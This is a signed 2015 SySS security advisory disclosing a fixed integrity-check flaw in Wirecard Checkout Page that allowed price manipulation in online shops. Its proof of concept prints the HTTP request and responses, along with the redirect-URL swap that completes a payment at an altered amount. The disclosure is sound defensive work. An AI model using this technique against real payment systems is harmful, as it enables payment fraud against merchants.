-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Advisory ID: SYSS-2015-061 
Product: Wirecard Checkout Page
Manufacturer: Wirecard AG
Affected Version(s): 1.0
Tested Version(s): 1.0
Vulnerability Type: Improper Validation of Integrity Check Value 
                    (CWE-354)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2015-11-03
Solution Date: 2015-11-03
Public Disclosure: 2015-11-04
CVE Reference: Not yet assigned
Author of Advisory: Martin Sturm (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Wirecard Checkout Page is a payment page that supports different popular
payment methods that can be integrated in online shops (see product Web 
site [1]).

Due to an improper validation of an integrity check value it is possible
to perform price manipulations in web shops using Wirecard Checkout
Page.

The vulnerability has already been fixed by the Wirecard AG by only
granting access to the checkout page when a valid fingerprint is
present.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Details about an order are sent to a Wirecard server. This order data
is protected by an integrity value named "fingerprint". If the 
transmitted data matches the fingerprint value, the server redirects the
user to a checkout page via a URL in the HTTP Location header in the
server response. Otherwise, if the order data is altered and the
fingerprint does not match the transmitted data, the server redirects
the user to a failure page.

Due to an improper validation of the integrity check value
"fingerprint", it is possible to access the checkout page and to 
successfully complete a transaction even if the corresponding order
data was manipulated in a previous request and does not match the
actual fingerprint. The Wirecard server reports the status of a successful
transaction to the web shop of the vendor indicating that everything
was in order.

In this way, it is possible to perform price manipulations.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTTP POST request is sent to the PHP script
checkout.wirecard.com/page/init.php:

POST /page/init.php HTTP/1.1
Host: checkout.wirecard.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1128

customerId=CUSTOMERID&
amount=AMOUNT&
currency=CURRENCY&
orderDescription=DESCRIPTION&
orderReference=REFID&
customerStatement=STATEMENT&
successUrl=SUCCESSURL&
failureUrl=FAILURL&
cancelUrl=CANCELURL&
serviceUrl=SERVICEURL&
confirmUrl=CONFIRM&
language=LANG&
displayText=TESTTEXT&
layout=desktop&
requestFingerprintOrder=secret%2CcustomerId%2Clanguage%2Camount%2Ccurrency%2CorderDescription%2CsuccessUrl%2CconfirmUrl%2CorderReference%2CcustomerStatement%2CrequestFingerprintOrder&
requestFingerprint=951b3a1acb90d2b62228b12a7bb66805&
paymentType=SOFORTUEBERWEISUNG


The transmitted data is secured by the fingerprint. Altering any of 
the parameters leads to a different fingerprint to be calculated on
the receiving server. Changing the amount leads to the following
failure response:

HTTP/1.1 302 Found
Date: Mon, 02 Nov 2015 10:56:25 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://checkout.wirecard.com/page/<CUSTOMERID>_DESKTOP/failureintermediate.php?SID=60tb8bf2lfr2s5oo30b2871en3
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


Changing the location URL from "failureintermediate" to "select" prompts
the Wirecard server to answer with the following response:

HTTP/1.1 302 Found
Date: Mon, 02 Nov 2015 10:57:03 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://checkout.wirecard.com/page/<CUSTOMERID>_DESKTOP/sueintermediate.php?SID=60tb8bf2lfr2s5oo30b2871en3
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


This page allows to complete the transaction with the incorrect amount 
entered earlier.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The back end of Wirecard Checkout Page  has been updated by the
manufacturer and the reported vulnerability has been fixed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-11-02: Vulnerability discovered
2015-11-03: Vulnerability reported to manufacturer
2015-11-03: Patch released by manufacturer
2015-11-04: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product Web Site for Wirecard Checkout Page
    https://www.wirecard.com/products/payment/wirecard-checkout-page/
[2] SySS Security Advisory SYSS-2015-061
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Martin Sturm of the SySS GmbH.

E-Mail: martin.sturm@syss.de
Public Key: https://syss.de/fileadmin/dokumente/Materialien/PGPKeys/Martin_Sturm.asc
Key ID: FB58AC9B
Key Fingerprint: EB18 CA7C BB12 9EAC 571F 15AE 2BDF 75C2 FB58 AC9B 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJWRetrAAoJECvfdcL7WKybYo4P/R/jYDVXoe32BJMgCcD+chPj
xDznYcmBRa92YELPzx/2Y0QYUnII/CieSMiToo1PTtDboMETYu3QHzC+73xXUZ7n
ML3BWLyJA8ufAKy0AIRSXZIK1X/9sS1+PuFHK97szbgL4UvqO42B2vmN/xKVdc6H
rkz0S/2jyU15XUlR34130I6PiZLUO90GPMI5zSd7zeZadi3n6TdNT/e0zp0LS5lZ
vLVT9zeByyyqRsjWFj+BbMvIh2mRLH6dJMMnjIAFZoapkF9WE6WHOG0Y/1hEHRMl
Xt2QAxLp/94aAHvPkhyvEdka43ZZ80kWnvTqfQhwM/2xRjX/7V/ux9EOLSKvWna0
fnyFSyyxiqOjNWXVSd3/920hBvjV1K2rVhQnf2OFNFVy2VnMLeb2mLxfefzm3QEe
XncQZEy/P3xtqYcOkBdlY/ZyYOeO0T1gIjdNfHGEgWcFbQ202MKrQzdIyzKFC6Bf
OvVI1XdMimKcuJ1FLaELod5CgRIyCZcjJMopnuX9Em7R2OIH2q8g+/Gp8JFtMDoS
TEoA3cAdund7Z7PpRUK+rmVAtgcvEVz+upI3PX0w788WWRRGP97+sgp+WFSROxdI
1JINczFP3hDBrjjcBEdWk5ZwpLPmBhjgv7zPgA1p7VhzG5j52De0kKhkEb2IEtkk
kWF99x8Rr7r5+KcXwxg5
=vQZ+
-----END PGP SIGNATURE-----